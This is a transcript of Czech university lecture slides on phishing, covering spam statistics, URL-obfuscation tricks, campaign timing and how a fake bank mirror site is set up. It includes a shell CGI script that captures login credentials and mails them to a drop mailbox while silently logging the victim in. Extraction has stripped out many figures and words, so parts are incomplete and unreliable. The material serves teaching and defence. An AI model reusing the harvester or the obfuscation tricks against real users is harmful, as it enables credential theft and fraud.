Počítačové viry a bezpečnost počítačových systémů. Phishing

Transkript

1 ! Počítačové viry a bezpečnost počítačových systémů Phishing prof. Ing. Ivan Zelinka, Ph.D. Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba Czech Republic! ivan.zelinka@vsb.cz Phone: GSM: prof. Ing. Ivan Zelinka, Ph.D.

2 Schéma přednášky

3 Schéma přednášky

4 Pishing V roce 2004 byly téměř 2 miliony občanů USA vystaveny útoku virtuálních zločinců Celkové ztráty dosáhly téměř 2 miliard dolarů phishingové ů stoupá (např. v r během 6. měsících o procent Podle společnosti Symantec, poskytovatele antispamové technologie, tvořil spam 63 procenta ze 2,93 miliardy ů zachycených softwarem společnosti Brightmail AntiSpam V polovině července roku 2004 zablokovaly filtry firmy Brightmail AntiSpam 9 milionů pokusů o phishing týdně. Tento počet v prosinci 2004 přesáhl 33 miliony zablokovaných zpráv týdně

5 Pishing průběhu 24 hodin v březnu 2005 bylo 10 z 12 ů oficiálně zařazeno jako spam a každá 82. zpráva v sobě skrývala virus Pokud alespoň 1 ze příjemců skutečně zareaguje na pobídku Klepněte sem", která se objevuje ve spamech, mají spammeři dostatečný finanční stimul k tomu, aby rozeslali dalších 5 milionů spamových zpráv Phishing představuje podskupinu kategorie spamu. Mezi hlavní identifikační rysy patří: nástroj pro hromadnou poštu a jeho vlastnosti zvyky v oblasti odesílání pošty včetně konkrétních stylů a rozvrhů, ale nejen jich druh systému používaného pro rozesílání spamu (v počítači, kde se y vytvářejí) druh systému používaného pro umístění phishingového serveru v struktura nepřátelského phishingového serveru včetně využívání HTML, JS, PHP a jiných skriptů

6 Pishing

7 Spam - pishing Nevyžádaná obchodní elektronická pošta (UCE) Neodpovídající obchodní elektronická pošta (NCE) Producenti seznamů Samy Scamy tvoří největší část spamu. Jejich účelem je získání významných finančních prostředků prostřednictvím oklamání uživatelů. Mezi podskupiny scamu patří 419 (scam nigerijského typu), malware a phishing.

8 Pishing Podle Internet Storm Center vydrží čistá schránka pod Windows bez jakékoli záplaty na Internetu odolávat průměrně 20 minut Pishing je definován jako primitivní metoda, jako způsob odeslání falšovaného upříjemci, který klamavým způsobem napodobuje legální instituci s úmyslem vyzvědět od příjemce důvěrné informace jako číslo platební karty nebo heslo k bankovnímu účtu. Takový většinou navádí uživatele, aby navštívil nějaké webové stránky a zadal zde tyto důvěrné informace. Tyto stránky mají design podobný jako instituce, za kterou se scammer vydává, aby získal vaši důvěru. Stránky této instituci samozřejmě nepatří a výsledkem je ukradení vašich důvěrných údajů za účelem finančního zisku. Proto je slovo phishing evidentně variací na slovo fishing (rybaření), kde scammer nakazuje háčky" v naději, že se do nich pár jeho obětí zakousne".

9 Pishing Příklad : matení oka Jednoduchým příkladem je wuw.citibank.com@ Webový prohlížeč přečte pravou stranu adresy a přejde na Google. v prohlížeči většinou indikuje uživatelské jméno a heslo, podobně jako u FTP. V případě, že se nezadá, je bezvýznamný. FTP přihlášení ve webovém prohlížeči může vypadat nějak takhle: ftp://username:pass@ftp.site.com. Aby to phisher ještě více zkomplikoval, zmate URL jeho nečitelným zakódováním. To lze provést mnoha způsoby. Nejdříve vyhledáme IP adresu pro Google, která je např Dále konvertujme řetězec do DWord (Double Word). Word je normální počet bitů, který je vyhovující pro provádění operací u konkrétní architektury. U architektury Intel je tímto počtem 16 bitů, takže Double Word bude 32 bitů a uvádí se v desetinné podobě. Matematicky se konverze IP adresy do DWord provede takto: (216* )*(256+57)*( ) = , čímž nás dostane na google.com

10 Pishing Lze zadat 56456/ a jsme na google.com Dále to lze ještě více zkomplikovat, šestnáctkový kód je 40. V případě URL se pro indikaci šestnáctkového kódu použije předpona %. Pakdostaneme

11 Co není phish Scam typu Nigerian 419 Tento scam, známý také jako advanced fee fraud, podvod typu vymáhání zálohového poplatku nebo také scam Ponzi, mezi nás přišel ještě před začátkem 80. let. Přichází ve formě faxu, dopisu nebo u. Podvodná internetová aukce Tyto scamy čítají až 64 % veškerých internetových podvodů a jsou hlavním druhem podvodu používaného na internetu (Internet Fraud Complaint Center,

12 Phish statistika Na Jednu hromadnou zásilku čítající ů přijme až 10 % příjemců a vynese okolo 1 % obětí. Phishers našli využití pro každý účet, který získají: od praní špinavých peněz k odcizení, podvodům a krádežím identity. Phishers zdokonalují svoje metody v oblasti key-loggingového malwaru (zaznamenávání stisku kláves). Místo sběru dat ze všech webových stránek vyhledávají data z jednotlivých URL a využívají i faktor botnetu a vyzbrojují se sami pomocí distribuovaných serverů po celém světě. Trojské koně jako Trojan.BankAsh nakazí soubory hostitelského počítače a berou si je na nepravé bankovní weby za účelem ukradení dat jejich uživatelů. Phishers využívají zranitelnost v rámci Cross-Site Scripting2 (XSS), možnosti přesměrování URL a jakékoli způsoby vykořisťování spojené s prohlížeči, které jim umožní provádět útoky za účelem získání informací o uživatelích.

13 Phish statistika Běžná metoda odhadu velikosti hromadné zásilky potřebuje využít shromážděné ové adresy: Vytvořte skupinu ových adres, které budete využívat pouze pro potřeby spamu. Obecně se jí říká spamový účet typu honeypot (úmyslně nezabezpečený systém, který umožňuje monitorovat podezřelou aktivitu). Provedte distribuci těchto ových adres do nižných míst. Tento proces se nazývá rozsévání, protože adresy z honeypotu se sází" do různých fór. Vyčkejte, dokud účty nezačnou přijímat spamy. Může to trvat hodiny i měsíce, podle daného fóra. phishing představuje 0,5 % veškerého spamu, nebo zhruba 25 milionů ů každý den.

14 Phish statistika úspěšnosti phishingu: téměř 50 % možných obětí - lidí, kteří klepnou na odkaz v u - se objeví během prvních 24 hodin po odeslání hromadné pošty v téměř 50 % možných obětí se objeví během dalších 24 hodin po odeslání hromadné pošty méně než 1 procento možných obětí vstoupí na stránku po 48 hodinách Phishingové servery, které se uzavřou během 24 hodin, mohou omezit míru návratnosti na polovinu. Naopak phishingové servery, které se neodstaví do 48 hodin, se vystavují 50% riziku, že budou během následujícího měsíce použity pro jiný phishingový útok. Doba mezi opětovným použitím se mění podle phishingových skupin - některé skupiny používají servery okamžitě znovu, jiné čekají s návratem týdny.

15 Phish statistika S během první hodiny po odeslání hromadné pošty může být až 20 % přístupů na phishingový server ze strany antiphishingových organizací. V logu to lze najít podle typu prohlížeče (wget je zřejmá indikace antiphishingové organizace) a IP adresy. Především IP adresa může vést ke známé antiphishingové skupině. V téměř 80 procent antiphishingových skupin, které na server vstoupí, tak činí během prvních 12 hodin. Po 48 hodinách patří téměř všechny přístupy antiphishingovým skupinám. Jsou to pravděpodobně skupiny, které ověřují, zda je server stále aktivní.

16 Falešná identita - zrcadlo V tomto kroku se pomocí SW robota provede stažení vybrané webové stránky. Povšimněte si souboru robots.txt, který slouží k zamezení přístupu robotů k vybraným částem stránek. Platí pouze pro roboty splňující normu RES-Robot Exclusion Standard.

17 Obsah souboru robot.txt může být například: Falešná identita - zrcadlo

18 Falešná identita - nastavení pishingového serveru

19 Falešná identita - založení anonymní schránky Všimli jste si, že jediný nepropojený odkaz vede na cgi/login.cgi? Je to náš hlavní cíl, protože zpracovává důvěrné přihlašovací údaje pro celou stránku. Nemáme přístup ke kódu cílové stránky pro Login.cgi, takže si vybudujeme svůj vlastní. Tento modifikovaný soubor Login.cgi provede dvě hlavní akce: zaznamená přihlašovací údaje, odešle je do naší anonymní schránky a zároveň odešle MITM POST zpátky na stránku s uživatelskými údaji a v zásadě se přihlásí místo něj. Tato technika MITM byla užita phishery, kteří se zaměřili na PayPal, je to diskrétní způsob, jak podfouknout oběť, aniž by si byla něčeho vědoma, jelikož jsme napojeni zpět na skutečný cíl a uživatel bude přihlášen.

20 Falešná identita - založení anonymní schránky #!/bin/sh PATH=/bin:/usr/bin:/usr/local/bin RSERVER=bank.securescience.net/bank URI='echo "${REQUEST_URI}" sed-e 's@.*/cgi/@/cgi/@'' # Give CGI header and start web page echo "Status: 301 Moved Content- Type: text/html Location: <html> <body> This page has moved to <a href=\" JJRI}</a> </body> </html>" Tento kód vezme URI z REQUEST_URI a odstraní vše až k /cgi/(za předpokladu, že /cgi/ je obsaženo v URÍ) a předává výsledky do URI.

21 Falešná identita - založení anonymní schránky pro zachycení dat použijeme ovou adresu jako naši anonymní schránku, pro ukázku použijme blind_drop@securescience.net. SENDER=stolen_data@securescience.net RECIPIENT=blind_drop@securescience.net POSTDATA='echo "${URI}" sed -e ' s/\/cgi\/login.cgi?//'' cat «! /usr/lib/sendmail -t From: ${SENDER} To: ${RECIPIENT} ${POSTDATA}!

22 Falešná identita - příprava phishingového u

23 Útok přesměrováním Pro phishingovou techniku přesměrování je standardním postupem sběr dat a přesměrování oběti na skutečnou stránku. Jedná se o jeden ze sofistikovanějších způsobů phishingového útoku, jelikož neexistuje žádná sběrná webová stránka, žádné obrázky a na jediném použitém serveru běží jen přesměrovací skript. Uživatel je vyzván k zadání svých přihlašovacích informací přímo do ové zprávy. Tento způsob phishingu je velmi populární na ebay, PayPal a elektronických obchodech jako např. Amazon. Od takových společností mnohem pravděpodobněji obdržíte ohledně výhod a nově nabízených služeb, takže napodobení postupu, který je pohodlnější pro zákazníky elektronických obchodů, je pochopitelné.